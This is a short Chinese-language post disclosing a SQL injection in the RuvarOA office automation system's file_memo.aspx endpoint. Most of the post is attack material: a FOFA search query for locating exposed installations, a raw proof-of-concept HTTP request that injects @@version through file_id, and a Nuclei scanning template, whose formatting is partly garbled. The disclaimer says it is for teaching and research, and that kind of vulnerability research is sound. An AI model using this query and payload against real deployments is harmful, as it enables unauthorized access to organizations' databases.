0x00 阅读须知
免责声明:本文提供的信息和方法仅供网络安全专业人员用于教学和研究目的,不得用于任何非法活动。读者若使用文章内容从事任何未授权的行为,需自行承担所有法律责任和后果。本公众号及作者对由此引起的任何直接或间接损失不负责任。请严格遵守相关法律法规。
0x01 漏洞简介
RuvarOA办公自动化系统是广州市璐华计算机科技有限公司采用组件技术和Web技术相结合,基于Windows平台,构建在大型关系数据库管理系统基础上的,以行政办公为核心,以集成融通业务办公为目标,将网络与无线通讯等信息技术完美结合在一起设计而成的新型办公自动化应用系统。这个系统在/filemanage/file_memo.aspx接口被发现存在SQL注入漏洞。
0x02 漏洞详情
fofa:app="RuvarOA协同办公平台"
Poc:
GET /filemanage/file_memo.aspx?file_id=@@version HTTP/1.1Host:User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5807.225 Safari/537.36 Edg/112.0.1791.33Connection: closeAccept-Encoding: gzip, deflate
0x03 Nuclie
id: RuvarOA-file_memo-sqliinfo:name: RuvarOA-file_memo-sqliauthor: yunkongseverity: highdescription: RuvarOA协同办公平台多处存在SQL注入漏洞tags: tagshttp:raw:|+GET /filemanage/file_memo.aspx?file_id=@@version HTTP/1.1Host:: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5807.225 Safari/537.36 Edg/112.0.1791.33Connection: close: andmatchers:type: binarypart: bodybinary:696f6e266c743b62722667743be59ca8e5b08620type: statusstatus:500
原文始发于微信公众号(贫僧法号云空):RuvarOA file_memo SQL注入漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论